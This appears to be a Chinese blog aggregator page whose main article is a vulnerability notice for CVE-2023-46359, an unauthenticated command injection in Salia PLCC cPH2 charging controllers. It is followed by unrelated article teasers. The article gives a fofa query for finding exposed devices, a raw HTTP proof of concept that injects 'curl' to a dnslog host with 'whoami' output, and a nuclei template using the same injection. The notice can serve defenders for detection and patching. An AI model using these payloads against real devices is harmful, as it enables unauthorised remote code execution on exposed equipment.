当前位置：首页 > news >正文

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

news 2025/9/17 16:04:07

漏洞描述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

产品界面

fofa语法

"Salia PLCC"

POC

GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http:%2F%2Fip.port.xxx.dnslog.pw/`whoami` HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

nuclei验证

id: CVE-2023-46359
info:
name: Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)
author: nobody
severity: critical
description: |
Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。
impact: |
攻击者可远程执行系统命令
remediation: |
升级版本，输入严格过滤
metadata:
verified: true
max-request: 3
fofa-query: "Salia PLCC"
tags: CVE-2023-46359
requests:
- raw:
- |
@timeout:20s
GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+curl+http:%2F%2F{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"
- type: word
part: body
words:
- "SUCCESS"
- type: status
status:
- 200

修复建议

建议升级到最新版本
对输入传参做严格过滤
声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

漏洞描述 Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞，该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。产品界面 fofa语法 "Salia PLCC" POC GET /connectioncheck.php?ip1…...

编程日记 2024/6/24 13:28:38

路由表操作

路由表（Routing Table）是网络设备（如计算机、路由器、交换机等）用来确定数据包传输路径的数据库。每当网络设备收到一个数据包时，它会查找路由表，决定将数据包转发到哪个网络接口或网关。下面介绍路由表的基…...

编程日记 2024/6/24 13:25:35

羊大师：拒绝心灵内耗：走向高效与平和

在繁忙的生活中，我们时常感到疲惫不堪，仿佛心灵被无形的枷锁束缚，这就是精神内耗。它让我们在思考、决策和行动中犹豫不决，消耗着我们的精力和时间，让我们无法专注于真正重要的事情。然而，我们有能力打破这…...

编程日记 2024/6/24 13:23:33

IOS Swift 从入门到精通：Swift 简介，Swift中变量和常量，Swift中字符串，Swift中整数和浮点数

文章目录为什么选择 Swift如何创建变量和常量如何创建变量和常量为什么 Swift 有常量和变量？如何创建字符串为什么 Swift 需要多行字符串？如何存储整数如何存储十进制数为什么选择 Swift 编程语言有很多，但我认为你会非常喜欢学习 Swift。这部分是出于实际原因——你可以在…...

编程日记 2024/6/24 13:22:32

聚焦AIoT最后一公里：EasyCVR+AI视频技术在各领域的创新应用

随着5G、AI、边缘计算、物联网（IoT）、云计算等技术的快速发展，万物互联已经从概念逐渐转变为现实，全新的行业生态AIoT正在开启新时代。巨大的市场潜力与AI等新兴技术不断融合形成的庞大市场缺口，深度场景化应用落地诉求…...

编程日记 2024/6/24 13:21:30

怎样利用 Groovy 的元编程特性来创建自定义的 DSL（领域特定语言）？

使用Groovy的元编程特性可以方便地创建自定义的领域特定语言（DSL）。下面是一些利用Groovy元编程特性创建DSL的步骤： 定义DSL的语法结构：首先，您需要确定DSL的语法结构，包括关键字、表达式和语句的格式等。可…...

编程日记 2024/6/24 13:19:29

自动预约申购 i茅台工具完善

自动预约申购茅台工具概述新的改变界面预览概述今天刷到一个windows自动刷茅台的工具，是用wpf实现的，看到作者最后是2023年更新的，评论中有好多人提出一些需求，刚才在学习wpf，就试着完善了一下。工具下载&#x…...

编程日记 2024/6/24 13:18:28

Jitter Injection详解

一、定义与作用 Jitter Injection，即抖动注入，是一种在通信系统中人为地添加抖动的技术。该技术通过在发送端对数据包进行延迟和抖动调整，以实现对整个通信系统的时延和抖动的控制。其主要作用包括： 改善传输质量：通…...

编程日记 2024/6/24 13:16:25

基于SSM+Jsp的校园餐厅管理

开发语言：Java框架：ssm技术：JSPJDK版本：JDK1.8服务器：tomcat7数据库：mysql 5.7（一定要5.7版本）数据库工具：Navicat11开发软件：eclipse/myeclipse/ideaMaven包…...

编程日记 2024/6/24 13:15:24

无线麦克风哪个品牌音质最好，一文告诉你无线领夹麦克风怎么挑选

随着直播带货和个人视频日志（Vlog）文化的兴起，以及自媒体内容创作的蓬勃发展，我们见证了麦克风行业的迅猛发展。在这一浪潮中，无线领夹麦克风以其无与伦比的便携性和操作效率，迅速赢得了广大视频制作者的喜…...

编程日记 2024/6/24 13:13:22

Docker配置国内镜像加速-2

Docker 官方镜像仓库（如 Docker Hub）可能由于网络原因，在某些地区或网络环境下下载速度较慢。使用镜像加速可以从距离用户更近、网络条件更好的镜像服务器获取镜像，从而显著提高下载速度，节省时间。 1.测试是否安装 d…...

编程日记 2024/6/24 13:12:20

前后端分离项目面试总结

一：是否登录状态服务端登录的时候，给分配一个session用于存储数据，同时将sessionID返回给浏览器，浏览器通过cookie把sessionID存储起来，下次访问时携带上，服务端就可以通过sessionID来确定用户是否登录。 …...

编程日记 2024/6/24 13:09:18

力扣刷题笔记

记录5-6月力扣刷题，持续刷题中~ 2024.05 15.三数之和双指针或者哈希表，注意去重的操作要考虑仔细 class Solution { public:vector<vector<int>> threeSum(vector<int>& nums) {vector<vector<int>> result;sort…...

编程日记 2024/6/24 13:06:15

【JS逆向百例】某点数据逆向分析，多方法详解

前言最近收到粉丝的私信，其在逆向某个站点时遇到了些问题，在查阅资料未果后，来询问K哥，K哥一向会尽力满足粉丝的需求。网上大多数分析该站点的教程已经不再适用，本文K哥将提供 3 种解决方案，对于 webpack…...

编程日记 2024/6/24 13:02:12

windows系统docker镜像导出

docker镜像导入导出(windows)_windowdocker下载镜像导出-CSDN博客https://blog.csdn.net/qq_22211217/article/details/93936363...

编程日记 2024/6/24 13:01:11

驱动地址： a. chromedriver:https://googlechromelabs.github.io/chrome-for-testing/ b. https://registry.npmmirror.com/binary.html?pathchromedriver/ selenium原理：Selenium 是一个用于自动化测试 Web 应用程序的工具集 a. 浏览器驱动&#xff0…...

编程日记 2024/6/24 13:00:10

[Python人工智能] 四十六.PyTorch入门 (1)环境搭建、神经网络普及和Torch基础知识

从本专栏开始，作者正式研究Python深度学习、神经网络及人工智能相关知识。前文讲解合如何利用keras和tensorflow构建基于注意力机制的CNN-BiLSTM-ATT-CRF模型，并实现中文实体识别研究。这篇文章将介绍PyTorch入门知识。前面我们的Python人工智能主要以TensorFlow和Keras为主，…...

编程日记 2024/6/24 12:59:09

示例:推荐一个应用Adorner做的通知和提示消息对话框

一、目的：在开发过程中，增加一些提示消息可以很好的提高用户体验，下面介绍一个用于增加提示消息的库二、效果如下可以看到右侧顶端弹出提示消息，消息间隔3s自动退出三、环境 VS2022 Net7 四、使用方式安装nuget包&#xff…...

编程日记 2024/6/24 12:58:07

nvdiadocker相关配置S3Gaussian

https://download.csdn.net/download/sinat_21699465/89458214 dockerfile文件参考： https://download.csdn.net/download/sinat_21699465/89458214 prework： 显卡驱动决定了cuda版本支持的上限。例如nvdia535驱动最高支持cuda12.2所以显卡驱动版本选…...

编程日记 2024/6/24 12:55:05

【科技前沿】电子设计新贵SmartEDA：为何它引领行业风潮？

在当今这个电子科技日新月异的时代，电子设计工具如同设计师的魔法棒，不断推动着产品创新的速度。而近期，一款名为SmartEDA的电子国产设计仿真软件异军突起，成为了行业内的新宠。那么，SmartEDA究竟有何过人之处&#xf…...

编程日记 2024/6/24 12:54:03

linux之kylin系统nginx的安装

一、nginx的作用 1.可做高性能的web服务器直接处理静态资源（HTML/CSS/图片等），响应速度远超传统服务器类似apache支持高并发连接 2.反向代理服务器隐藏后端服务器IP地址，提高安全性 3.负载均衡服务器支持多种策略分发流量…...

编程新知 2025/9/14 11:16:46

智慧医疗能源事业线深度画像分析（上）

引言医疗行业作为现代社会的关键基础设施，其能源消耗与环境影响正日益受到关注。随着全球"双碳"目标的推进和可持续发展理念的深入，智慧医疗能源事业线应运而生，致力于通过创新技术与管理方案，重构医疗领域的能源使用模式。这一事业线融合了能源管理、可持续发…...

编程新知 2025/9/16 1:45:47

应用升级/灾备测试时使用guarantee 闪回点迅速回退

1.场景应用要升级,当升级失败时,数据库回退到升级前. 要测试系统,测试完成后,数据库要回退到测试前。相对于RMAN恢复需要很长时间， 数据库闪回只需要几分钟。 2.技术实现数据库设置 2个db_recovery参数创建guarantee闪回点，不需要开启数据库闪回。…...

编程新知 2025/7/30 7:20:17

微软PowerBI考试 PL300-选择 Power BI 模型框架【附练习数据】

微软PowerBI考试 PL300-选择 Power BI 模型框架 20 多年来，Microsoft 持续对企业商业智能 (BI) 进行大量投资。 Azure Analysis Services (AAS) 和 SQL Server Analysis Services (SSAS) 基于无数企业使用的成熟的 BI 数据建模技术。同样的技术也是 Power BI 数据…...

编程新知 2025/9/17 9:46:40